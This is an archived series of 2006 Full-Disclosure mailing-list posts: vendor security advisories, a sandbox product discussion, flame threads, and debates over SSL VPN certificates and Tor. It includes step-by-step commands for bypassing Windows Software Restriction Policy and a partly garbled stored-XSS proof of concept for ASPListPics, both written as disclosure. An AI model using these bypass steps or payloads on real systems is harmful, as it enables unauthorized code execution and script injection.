[Full-disclosure] [SECURITY] [DSA 1095-1] New freetype packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1095-1[EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze June 10th, 2006 http://www.debian.org/security/faq - -- Package: freetype Vulnerability : integer overflows Problem type : local (remote) Debian-specific: no CVE IDs: CVE-2006-0747 CVE-2006-1861 CVE-2006-2493 CVE-2006-2661 CERT advisory : BugTraq ID : 18034 Debian Bug : Several problems have been discovered in the FreeType 2 font engine. The Common vulnerabilities and Exposures project identifies the following problems: CVE-2006-0747 Several integer underflows have been discovered which could allow remote attackers to cause a denial of service. CVE-2006-1861 Chris Evans discovered several integer overflows that lead to a denial of service or could possibly even lead to the execution of arbitrary code. CVE-2006-2493 Several more integer overflows have been discovered which could possibly lead to the execution of arbitrary code. CVE-2006-2661 A null pointer dereference could cause a denial of service. For the old stable distribution (woody) these problems have been fixed in version 2.0.9-1woody1. For the stable distribution (sarge) these problems have been fixed in version 2.1.7-2.5. For the unstable distribution (sid) these problems will be fixed soon We recommend that you upgrade your libfreetype packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/f/freetype/freetype_2.0.9-1woody1.dsc Size/MD5 checksum: 672 e9f338a6cc7d4f8924ec9df3dd14035a http://security.debian.org/pool/updates/main/f/freetype/freetype_2.0.9-1woody1.diff.gz Size/MD5 checksum:17441 8313446b932167b006e7b039c6890821 http://security.debian.org/pool/updates/main/f/freetype/freetype_2.0.9.orig.tar.gz Size/MD5 checksum: 908842 102e1d651fd6404e656e3d1d8a36a4a0 Alpha architecture: http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.0.9-1woody1_alpha.deb Size/MD5 checksum:72438 81cf505ba02eb5167141388fedd84177 http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.0.9-1woody1_alpha.deb Size/MD5 checksum: 244742 599b407104960c51a32c75782ccc6bcb http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.0.9-1woody1_alpha.deb Size/MD5 checksum: 598368 f5bb8504b2d91b0af7cd878f661520d4 ARM architecture: http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.0.9-1woody1_arm.deb Size/MD5 checksum:38802 0890e233c07cfa17fcf4de4e312ee0cb http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.0.9-1woody1_arm.deb Size/MD5 checksum: 211736 c071143fd0bcbba47e3be584dd52c9b5 http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.0.9-1woody1_arm.deb Size/MD5 checksum: 565936 3ea6b5786fdc1b74c8ce501a83f87b56 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.0.9-1woody1_i386.deb Size/MD5 checksum:37128 55f75b5277bc86e66167bd92019d0dc0 http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.0.9-1woody1_i386.deb Size/MD5 checksum: 208990 c59dc78191132dcc3db2ad6e529ed872 http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.0.9-1woody1_i386.deb Size/MD5 checksum: 541294 028c883672af3f15cdea4595e124d12d Intel IA-64 architecture: http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.0.9-1woody1_ia64.deb Size/MD5 checksum:91606 34dd0d964ef7f5471a9d8aca9204eae6 http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.0.9-1woody1_ia64.deb Size/MD5 checksum: 314490 f277129e151512f5f40f7dac92bd70ca http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.0.9-1woody1_ia64.deb Size/MD5 checksum: 661156 2da5eeaec642e9ad417f05d556042654 HP Precision architecture: http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.0.9-1woody1_hppa.deb Size/MD5 checksum:65954 01f070e5a891f294673ecc02746e2a3e htt
Re: [Full-disclosure] n3td3v bashers on FD
I do not get your point about n3td3v . i also do not get "Good point about symantec" Are you stating that Symantec is not trustworthy ? Javor Ninov aka DrFrancky http://securitydot.net Alexander Hristov wrote: > Good point about symantec > On 6/3/06, n3td3v <[EMAIL PROTECTED]> wrote: >> We're the biggest security group around, theres nothing you can say to >> change that. We are professionals who work at the major dot-coms and >> earn all the money, you people are just stupid. You call us lame but >> look at you. None of you have released vulnerabilites. None of you are >> at the cutting edge of hacking, we're at the frontline of new tactics >> to hack application and network security. You guys are just the people >> sitting and waiting for hackers to post code so you can write about us >> on securityfocus.com and news.com. Joris Evers and Robert Lemos >> (Symantec/CNET) are making money out of everything posted on this >> list, thats why they are multi million dollar corporations. They hate >> to see this list disrupted, because they can't make money while n3td3v >> bashing activity is underway. They hate to see their profit margins >> dipping, they don't like to see there mail box filled with propaganda >> for the biggest international non-profit group around. They want us to >> leave the list so they can make money from their software to sell to >> people. We're seen as the enemy... >> Not only do Symantec and CNET hate us, script kids hate us as well, >> because while the bashing is going on, no one is posting "free exploit >> code" for them to deface web sites with. Hahaha. The Script kids and >> Symantec/ CNETare the ones who hate n3td3v, all the real hackers are >> on the side of n3td3v, its all about money at the end of the day. The >> people who can hack their own zero-day don't care if n3td3v posts to >> FD or not, its only script kids and Symantec CNET who care, because >> without FD, they wouldnt have any other source of information to know >> whats going on. These people need FD, its like a life line to them, if >> it wasn't for FD, Symantec wouldn't know what was going on and neither >> would CNET, they wouldn't know what hackers were upto without FD and >> Bugtraq list. >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v bashers on FD
Good point about symantec On 6/3/06, n3td3v <[EMAIL PROTECTED]> wrote: We're the biggest security group around, theres nothing you can say to change that. We are professionals who work at the major dot-coms and earn all the money, you people are just stupid. You call us lame but look at you. None of you have released vulnerabilites. None of you are at the cutting edge of hacking, we're at the frontline of new tactics to hack application and network security. You guys are just the people sitting and waiting for hackers to post code so you can write about us on securityfocus.com and news.com. Joris Evers and Robert Lemos (Symantec/CNET) are making money out of everything posted on this list, thats why they are multi million dollar corporations. They hate to see this list disrupted, because they can't make money while n3td3v bashing activity is underway. They hate to see their profit margins dipping, they don't like to see there mail box filled with propaganda for the biggest international non-profit group around. They want us to leave the list so they can make money from their software to sell to people. We're seen as the enemy... Not only do Symantec and CNET hate us, script kids hate us as well, because while the bashing is going on, no one is posting "free exploit code" for them to deface web sites with. Hahaha. The Script kids and Symantec/ CNETare the ones who hate n3td3v, all the real hackers are on the side of n3td3v, its all about money at the end of the day. The people who can hack their own zero-day don't care if n3td3v posts to FD or not, its only script kids and Symantec CNET who care, because without FD, they wouldnt have any other source of information to know whats going on. These people need FD, its like a life line to them, if it wasn't for FD, Symantec wouldn't know what was going on and neither would CNET, they wouldn't know what hackers were upto without FD and Bugtraq list. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Best Regards, Aleksander Hristov < root at securitydot.net > < http://securitydot.net > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Want to test this desktop barrier?, (Unauthorized offer) 0day protection
Hi Dan,
There's a couple of ways it differs.
1. Programs running in DROPMYRIGHTS and RunAs can still access files and
directories to which 'everyone' has access. It's not common for someone
to check rights of every single directory in a computer to check who has
access to what. A virtualized environment controls what directories the
environment has access to, to prevent dropping files in unwanted areas,
and to prevent reading confidential data from files. For example;
MS-Word launched in the virtualized space to open a download shouldn't
be able to open files in 'My Documents'.
2. DROPMYRIGHTS and RunAs exclude membership of the lowered user from
known privileged user groups, but not custom privileged user groups.
For example; you may have created a new group for backup (backup_exec),
and since that new group is not a known privileged group, membership of
the lowered user of that group is ignored. See tables in:
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dncode/
html/secure11152004.asp
3. Changing the access permissions of a program to certain resources
often causes the program to crash. It's a problem if the only
permissions available are read/write/modify/delete/enumerate, and it's
undesirable to write or modify a value, and a program has to write or
modify a value to run. For usability reasons, effectively having a
'virtualize' permission is useful. This way only a copy of the value or
a temporary value is changed, which permits the program to run without
crashingin a controlled environment. This virtualization can be done
for filesystem and registry, but also system calls and COM can be
virtualized (spoofed) to the virtual environment.
HTH
Bill Stout
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Dan
Renner
Sent: Thursday, June 08, 2006 10:33 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Want to test this desktop
barrier?,(Unauthorized offer) 0day protection
This is definitely has more luxury features, but couldn't you do pretty
much the same with MSDN's DROPMYRIGHTS program?
It runs {whatever} program as a guest user, effectively dropping the
capabilities of that program to do nefarious things.
--
Sincerely,
Dan Renner
President
Los Angeles Computerhelp
http://losangelescomputerhelp.com
818.352.8700
[EMAIL PROTECTED] wrote:
> Message: 9
>
>Date: Thu, 8 Jun 2006 10:14:21 -0700
>From: "Bill Stout" <[EMAIL PROTECTED]>
>Subject: [Full-disclosure] Want to test this desktop barrier?
> (Unauthorized offer) 0day protection
>To:
>Message-ID:
> <[EMAIL PROTECTED]>
>Content-Type: text/plain; charset="us-ascii"
>
>Hello All,
>
>We have an early release of consumer desktop safety software that I'd
>like some feedback on.
>
>http://www.greenborder.com/earlyaccess/
>
>Our software runs on XP SP2, and creates an application-level virtual
>environment primarily (for now) for Internet Explorer. This prevents
>modification of the base system by any content in the virtual
>environment. We refer to the virtual environment as 'x-space', or
>'within GreenBorder'. We apply access control from the virtual
>environment to; the filesystem, registry, user shell, COM objects, and
>system calls.
>
>Although only Internet Explorer and applications which open downloaded
>attachments are supported, other applications can be launched in the
>GreenBorder environment. Any processes running or temporary files or
>temporary registry entries are wiped from the virtual environment by an
>application reset. Files can be saved to a specific directory only,
and
>applications in this environment are prevented from reading files
>outside this one directory (applies confidentiality).
>
>We don't determine what application running in the virtual environment
>is malicious or not, so therefore this is not a replacement for
>signature based protection systems. Most anything can run in the
>environment, it just can't modify local resources. This is great
>protection for 0-day exploits, and lets administrators wait to apply
>patches off-hours.
>
>Hammer on our software by running malware of your choice in the
software
>environment. Please email me or the marketing email of your results.
>If you're running intensive tests, I would still recommend using a
>scratch system.
>
>We also have an enterprise version which uses a central whitelist to
>determine in which environment to open a site requested or Outlook
>message received.
>
>Bill Stout
>www.greenborder.com
>
>
>Appended below is our marketing spiel:
>
>
>
>"We are very pleased to give you special, early access to GreenBorder
>Pro, the new consumer edition of our patented enterprise technology
>(that's already protecting thousands of users in some of the most
>demanding environments).
>
>With GreenBorder Pro, NOTHING CAN BREAK INTO YOUR PC from the Web. You
>can:
> * Search & browse ANY website-without putting your PC,
[Full-disclosure] RE: Windows Software Restriction Policy Protection Bypass
This has been publically known and disclosed for many years, since XP
Pro was first released.
-Original Message-
From: 3APA3A [mailto:[EMAIL PROTECTED]
Sent: Friday, June 09, 2006 4:05 AM
To: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk
Subject: Windows Software Restriction Policy Protection Bypass
Dear bugtraq@securityfocus.com,
It was reported anonymously with request to post to lists.
Windows Software Restriction Policy Protection Bypass
Author: Anonymous
Class: Restrictions bypass
Vector: Local
Vendor: Microsoft
Sofware: Windows XP SP2, Windows Server 2003 SP1
Risk level: Low
Remark:
I don't know, what is it - bug or feature, but I can't find any
documentation on this issue.
Description:
Software Restriction Policies restrictions doesn't apply if user logon
via secondary logon service (Run As).
Test:
Create new SRP policy (in Local or Domain Level GPO, for User or for
Computer). Change security levels to Disallowed. Update policy and logon
as restricted user. Copy notepad to the desktop. Try to launch notepad
from desktop (will fail). Right click on notepad, choose run as, select
"Following users", and type current user name and password. You'll see
launched notepad. CLI version (runas.exe) provides similar results.
Remark.
Why ACLs are not workaround?
If user has ability to write (create files) in any folder (for example -
profile, temporary internet files, whatever) he (or she of cause)
becomes the owner of created files. And even we revoke NTFS execute
permission on any writable folder, user can change permissions on files,
because he (or she of
cause) is creator/owner for said file.
Example (user 'test' is not an administrator):
cd \noexec
copy \WINDOWS\system32\notepad.exe .
C:\noexec>cacls notepad.exe
C:\noexec\notepad.exe BUILTIN\Users:(DENY)(Special access:)
FILE_EXECUTE
BUILTIN\Users:(DENY)(Special access:)
WRITE_DAC
WRITE_OWNER
BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
WINXP01\test:F
BUILTIN\Users:R
C:\noexec>notepad.exe
Access denided.
C:\noexec>cacls.exe notepad.exe /G test:F C:\noexec>cacls notepad.exe
C:\noexec\notepad.exe WINXP01\test:F
C:\noexec>notepad.exe
Workaround:
Disable Secondary Logon service:
sc stop seclogon
sc config seclogon start= disabled
Timeline:
05.06 - Vulnerability discovered
08.06.06 - Vendor notification
09.06.06 - Vendor response
"Software Restriction Policy and Group Policy are not meant to be
complete security features...For full security, we recommend using ACLs
to protect the appropriate resources in your environment..."
09.06.06 - Public disclosure
--
http://www.security.nnov.ru
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The
Beatles)
+-o66o--+ /
|/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Separate Debian from Full Disclosure
On 6/9/06, ßµªSKãR †|wãri wrote: Hi all Here is a request to please do not merge Debian Mailing List's Mails with Full Disclosure Why? If they pertain to security vulnerabilities, they surely belong on Full Disclosure. "Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information." From: http://lists.grok.org.uk/full-disclosure-charter.html -Eliah ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Want to test this desktop barrier?, (Unauthorized offer) 0day protection
It's very light on the machine, does not slows down the browser. It also
gives acess to clipboard and other features outside the sandbox.
The site claims it works with Internet explorer, and it's their default
browser, but I opened Firefox, browsed around a little, changed a lot of
configurations, and it returned to the previous state after I finished
the session.
I'm starting to enjoy the red border around GreenBorder's daltonic
programmers fine piece of software. :):):)
On Fri, 9 Jun 2006 16:23:16 -0700
"Christian Swartzbaugh" <[EMAIL PROTECTED]> wrote:
CS> Dan,
CS> Sure both methods will prevent many viri from taking over your
CS> computer, but notice there is a major difference. You obviously have
CS> not used a limited account before because usually software developed
CS> for Windows will require some configuration or settings change in
CS> order to correctly function under a limited account, with a few
CS> notable exceptions. This instead claims to create a sandbox where the
CS> functionality of an Administrator account is preserved without the
CS> harmful effects by using a virtual type of environment that is
CS> separate.
CS>
CS> I haven't used the software, but from the summary, that seems to be
CS> what was intended. Correct me if otherwise.
CS>
CS> feofil
CS>
CS>
CS>
CS>
CS> On 6/8/06, Dan Renner <[EMAIL PROTECTED]> wrote:
CS> > This is definitely has more luxury features, but couldn't you do pretty
CS> > much the same with MSDN's DROPMYRIGHTS program?
CS> >
CS> > It runs {whatever} program as a guest user, effectively dropping the
CS> > capabilities of that program to do nefarious things.
CS> >
CS> > --
CS> >
CS> > Sincerely,
CS> >
CS> > Dan Renner
CS> > President
CS> > Los Angeles Computerhelp
CS> > http://losangelescomputerhelp.com
CS> > 818.352.8700
CS>
CS> ___
CS> Full-Disclosure - We believe in it.
CS> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
CS> Hosted and sponsored by Secunia - http://secunia.com/
CS>
Allgemeinen Anschulterlaubnis
Cardoso <[EMAIL PROTECTED]> - SkypeIn: (11) 3711-2466 / (41) 3941-5299
vida digital: http://www.contraditorium.com site pessoal e blog:
http://www.carloscardoso.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Want to test this desktop barrier?, (Unauthorized offer) 0day protection
Dan,
Sure both methods will prevent many viri from taking over your
computer, but notice there is a major difference. You obviously have
not used a limited account before because usually software developed
for Windows will require some configuration or settings change in
order to correctly function under a limited account, with a few
notable exceptions. This instead claims to create a sandbox where the
functionality of an Administrator account is preserved without the
harmful effects by using a virtual type of environment that is
separate.
I haven't used the software, but from the summary, that seems to be
what was intended. Correct me if otherwise.
feofil
On 6/8/06, Dan Renner <[EMAIL PROTECTED]> wrote:
This is definitely has more luxury features, but couldn't you do pretty
much the same with MSDN's DROPMYRIGHTS program?
It runs {whatever} program as a guest user, effectively dropping the
capabilities of that program to do nefarious things.
--
Sincerely,
Dan Renner
President
Los Angeles Computerhelp
http://losangelescomputerhelp.com
818.352.8700
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Want to test this desktop barrier?, (Unauthorized offer) 0day protection
This is definitely has more luxury features, but couldn't you do pretty
much the same with MSDN's DROPMYRIGHTS program?
It runs {whatever} program as a guest user, effectively dropping the
capabilities of that program to do nefarious things.
--
Sincerely,
Dan Renner
President
Los Angeles Computerhelp
http://losangelescomputerhelp.com
818.352.8700
[EMAIL PROTECTED] wrote:
Message: 9
Date: Thu, 8 Jun 2006 10:14:21 -0700
From: "Bill Stout" <[EMAIL PROTECTED]>
Subject: [Full-disclosure] Want to test this desktop barrier?
(Unauthorized offer) 0day protection
To:
Message-ID:
<[EMAIL PROTECTED]>
Content-Type: text/plain; charset="us-ascii"
Hello All,
We have an early release of consumer desktop safety software that I'd
like some feedback on.
http://www.greenborder.com/earlyaccess/
Our software runs on XP SP2, and creates an application-level virtual
environment primarily (for now) for Internet Explorer. This prevents
modification of the base system by any content in the virtual
environment. We refer to the virtual environment as 'x-space', or
'within GreenBorder'. We apply access control from the virtual
environment to; the filesystem, registry, user shell, COM objects, and
system calls.
Although only Internet Explorer and applications which open downloaded
attachments are supported, other applications can be launched in the
GreenBorder environment. Any processes running or temporary files or
temporary registry entries are wiped from the virtual environment by an
application reset. Files can be saved to a specific directory only, and
applications in this environment are prevented from reading files
outside this one directory (applies confidentiality).
We don't determine what application running in the virtual environment
is malicious or not, so therefore this is not a replacement for
signature based protection systems. Most anything can run in the
environment, it just can't modify local resources. This is great
protection for 0-day exploits, and lets administrators wait to apply
patches off-hours.
Hammer on our software by running malware of your choice in the software
environment. Please email me or the marketing email of your results.
If you're running intensive tests, I would still recommend using a
scratch system.
We also have an enterprise version which uses a central whitelist to
determine in which environment to open a site requested or Outlook
message received.
Bill Stout
www.greenborder.com
Appended below is our marketing spiel:
"We are very pleased to give you special, early access to GreenBorder
Pro, the new consumer edition of our patented enterprise technology
(that's already protecting thousands of users in some of the most
demanding environments).
With GreenBorder Pro, NOTHING CAN BREAK INTO YOUR PC from the Web. You
can:
* Search & browse ANY website-without putting your PC, files or
private
identity data at risk (or leaving any trace on your PC of where you
have been :)
* Shop & bank in privacy-without anything spying on your personal
info,
bank account and credit card numbers, passwords or online
transactions
* Use any downloads-without worrying about anything nasty hidden
inside
Simply click on the link below to get to the GreenBorder Pro VIP page.
There, you can see a guided tour, learn about the software, and download
your own copy. Here is a special VIP license key to copy & paste when
you install:
34422VS279429422K44W
Click here to get GreenBorder Pro
We would greatly appreciate any comments or suggestions you might have
along the way. Just email us at [EMAIL PROTECTED] or click on the
GreenBorder icon and select Contact Customer Support in the software
itself!"
-- next part --
An HTML attachment was scrubbed...
URL:
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060608/e9340292/attachment.html
--
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
End of Full-Disclosure Digest, Vol 16, Issue 16
***
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] n3td3v bashers on FD
LOL You know, I came here for the information. But I stay solely for the entertainment. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Rob Connon (Info) Sent: Friday, June 09, 2006 3:49 PM To: Sergej Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] n3td3v bashers on FD >Who is this n3td3v? Only posts i find from him is just words like "we >the rulez group" "we are the best" "you all are stupid" "internet is >ours" or similar. > > > If this has been posted before please do forgive me, i found this while looking around for amusing background info to pass my slowly moving friday afternoon.. www.n3td3v.com This should provide some background for people interesting in this internet phenomena. /rjc ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v bashers on FD
Who is this n3td3v? Only posts i find from him is just words like "we the rulez group" "we are the best" "you all are stupid" "internet is ours" or similar. If this has been posted before please do forgive me, i found this while looking around for amusing background info to pass my slowly moving friday afternoon.. www.n3td3v.com This should provide some background for people interesting in this internet phenomena. /rjc smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200606-08 ] WordPress: Arbitrary command execution
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200606-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: WordPress: Arbitrary command execution Date: June 09, 2006 Bugs: #134397 ID: 200606-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis WordPress fails to sufficiently check the format of cached username data. Background == WordPress is a PHP and MySQL based content management and publishing system. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-apps/wordpress < 2.0.3 >= 2.0.3 Description === rgod discovered that WordPress insufficiently checks the format of cached username data. Impact == An attacker could exploit this vulnerability to execute arbitrary commands by sending a specially crafted username. As of Wordpress 2.0.2 the user data cache is disabled as the default. Workaround == There are no known workarounds at this time. Resolution == All WordPress users should upgrade to the latest available version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-apps/wordpress-2.0.3" References == [ 1 ] CVE-2006-2667 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2667 [ 2 ] CVE-2006-2702 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2702 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200606-08.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpksmAe4IV9a.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] rPSA-2006-0099-1 openldap openldap-clients openldap-servers
rPath Security Advisory: 2006-0099-1 Published: 2006-06-09 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Weakness Updated Versions: openldap=/[EMAIL PROTECTED]:devel//1/2.2.26-8.3-1 openldap-clients=/[EMAIL PROTECTED]:devel//1/2.2.26-8.3-1 openldap-servers=/[EMAIL PROTECTED]:devel//1/2.2.26-8.3-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2754 http://issues.rpath.com/browse/RPL-423 http://secunia.com/advisories/20126 Description: Previous versions of the openldap server have a weakness reading the openldap status file. This weakness may result in some vulnerability, which may include denial of service or remote privilege escalation when an openldap service is exposed. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ASPListPics
- EXPL-A-2006-003 exploitlabs.com Retro Advisory 001 - - ASPListpics - RETRO-RELEASE DATE: === Nov 11, 2004 Duplicate Release: June 06, 2006 by: r0t http://pridels.blogspot.com/2006/06/asp-listpics-43-xss-vuln.html http://secunia.com/advisories/20517/ OVERVIEW ASPListpics is a highly configurable ASP application that automatically generates fast thumbnail web indexes of images in a folder structure. AFFECTED PRODUCTS = ASPListpics 4.x http://www.iisworks.com DETAILS === 1. XSS ( persistant ) PROOF OF CONCEPT LINKS AND RETRO-POC = 1. XSS ( Cross Site Scripting ) There is persistant XSS inclusion in the "comments" feature of ASPListpics in the following: field "name" field "comment" By embedding various types of XSS into the comment section, we are able to render javascript in the users browser. below is a simple PoC ( Proof of Concept ) enter into the "comments" section malicious script. comment: ohnohttp://whatismyip.com";>ouch and is rendered as: HTTP://[VUNERABLEHOST]/listpics/listpics.asp?a=rate&ID=[PICID]&Info=< SCRIPTING HERE >9000|0 CREDITS === r0t - http://pridels.blogspot.com/2006/06/asp-listpics-43-xss-vuln.html RETRO-CREDITS = This vulnerability was discovered and researched by Donnie Werner of exploitlabs. At the original time of discovery and retro-release date, the author was not aware of any other advisories or patches available. Retro-Advisories are released when either the same research is released by a 3rd party, old private research that is no longer active, or the product has been patched due to Vendor updates before a formal Exploitlabs advisory was released to the public. Donnie Werner [EMAIL PROTECTED] [EMAIL PROTECTED] -- web: http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSL VPNs and security
Are you referring to telling end-users to click "Accept this certificate permanently" box on the certificate warning pop-up? Or is there a software package out there that can do this without the warning pop-up? In Windoze, if you have a .cer file, and did the use fields correctly when you issued it, the cert will go into the right certificate store automagically. You'd just link to that file somewhere and tell people to "right click, save to desktop, then double-click it there". ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSL VPNs and security
On 6/9/06, Tim <[EMAIL PROTECTED]> wrote: For non-managed systems (which you shouldn't allow into your network via a VPN anyway), installing a CA cert is as simple as clicking on a link ONCE, and installing the cert. This cert can be distributed over a VeriSign secured SSL connection. Are you referring to telling end-users to click "Accept this certificate permanently" box on the certificate warning pop-up? Or is there a software package out there that can do this without the warning pop-up? - Brian ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.
On 6/9/06, Rodrigo Barbosa <[EMAIL PROTECTED]> wrote: Just because a park is a public place doesn't give me the write to, lets say, drive a car over the grass. Even if public places there are rules that should be followed. Yea, but if you steal a car or take off your license plate and drive over the grass, no matter how many witnesses saw you do it, your probably going to get away with it. But on the matter of TOR. If people want to block it just for protection against anonymous attacks, well then that's a waste of time. Duck ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSL VPNs and security
> Sure, it's trivial to create self-signed certs (or run a CA), but > distributing your cert (or the CA cert) to all but a handful of clients > is a logistical nightmare. For company managed laptops, it is trivial to distribute via normal software distribution processes. For non-managed systems (which you shouldn't allow into your network via a VPN anyway), installing a CA cert is as simple as clicking on a link ONCE, and installing the cert. This cert can be distributed over a VeriSign secured SSL connection. Then when the website presents a page, it can dynamically sign certs for each domain. This stuff isn't really that hard. The tools that the industry has provided users just suck, that's all. > If you're going to be installing stuff, might as well make that a > IKE/IPSEC client and do it the right way to begin with. Well, I don't disagree with this one, but so many people who complain about certificate distribution have not thought through the ways it can happen. Even with a real VPN, you really should be using client certs anyway, which present the same distribution problems. These problems aren't made any easier by using a "trustyworthy" CA which charges you. The software you use is the biggest contributor to management headaches. tim ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.
Michael Holstein <[EMAIL PROTECTED]> wrote: First, I'm a long time supporter of Tor and a staunch advocate of anonymity and privacy. I also believe your interpretation of the Internet is a bit... distorted. :) > We're not talking about authenticated websites here (perhaps I should > have made that more clear), nor are we talking about using TOR, etc. > for malicious purposes. > > For the purpose of this (largely theoretical) argument, I meant > "publicly accessible, non-authenticated websites". And you're trying to justify unrestricted access to those public places based on what amounts to a "discrimination" argument. A fallacious premise. Choosing to be anonymous isn't something you are, it's something you do. A conscious choice, not an unavoidable consequence of your state of being like race/color or sexual orientation. Consequently, it's a quality that has no moral or legal protection. Operators of public places certainly *do* have the right to regulate access based on the conscious choices their prospective patrons. A restaurant, for example, can restrict access with an arbitrary dress code along the lines of "suit and tie". They can even enforce that policy according to time of day if they wish. Operating a "public access" entity doesn't mean you abdicate all your rights to limit access, it only means you're obligated to not limit access based on certain criteria. You still have every right to set non-discriminatory standards, and enforce them as you see fit as long as the practice doesn't breach the rights of your patrons. Now what beside a clothing choice, is Tor? :) -- Hand Crafted on Fri. Jun 09, 2006 at 13:27 Outside of a dog, a book is a man's best friend. Inside of a 